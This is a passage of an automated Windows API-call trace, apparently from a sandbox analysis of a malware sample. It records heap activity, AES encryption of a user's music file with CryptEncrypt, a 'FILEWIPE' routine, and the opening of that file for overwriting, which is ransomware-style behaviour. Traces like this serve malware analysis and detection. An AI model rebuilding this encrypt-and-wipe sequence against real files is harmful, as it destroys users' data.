(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.962] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.962] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da158, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da158*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.962] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.962] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.962] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0038.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.962] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.962] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.962] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.962] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.963] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.963] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.963] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.963] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.963] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.964] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xec62, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xec70) returned 1 [0038.964] CharLowerBuffW (in: lpsz="byte[60529]", cchLength=0xb | out: lpsz="byte[60529]") returned 0xb [0038.965] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.965] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.965] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x943c78*, pdwDataLen=0x6ae220*=0xec62, dwBufLen=0xec70 | out: pbData=0x943c78*, pdwDataLen=0x6ae220*=0xec70) returned 1 [0038.965] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.972] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.973] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.973] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.973] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0038.973] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.973] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.973] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.973] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.973] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.974] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.974] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.974] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0038.974] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.974] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0038.975] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.976] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4623dd80, ftCreationTime.dwHighDateTime=0x1d5ba60, ftLastAccessTime.dwLowDateTime=0xb95244e0, ftLastAccessTime.dwHighDateTime=0x1d5b5f1, ftLastWriteTime.dwLowDateTime=0xb95244e0, ftLastWriteTime.dwHighDateTime=0x1d5b5f1, nFileSizeHigh=0x0, nFileSizeLow=0xec62, dwReserved0=0x0, dwReserved1=0x777648, cFileName="BT6E6z.m4a", cAlternateFileName="")) returned 0x7c2100 [0038.976] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.976] CharLowerBuffW (in: lpsz="byte[60514]", cchLength=0xb | out: lpsz="byte[60514]") returned 0xb [0038.976] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.976] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.976] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.976] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.977] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.977] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.978] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\bt6e6z.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0038.978] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 